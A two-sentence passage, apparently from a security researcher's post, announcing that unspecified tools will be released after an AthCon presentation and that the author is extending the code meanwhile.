I will release all the tools after my AthCon presentation. In the meantime,
I’ll be working on extending the code to do lots of other cool stuff with it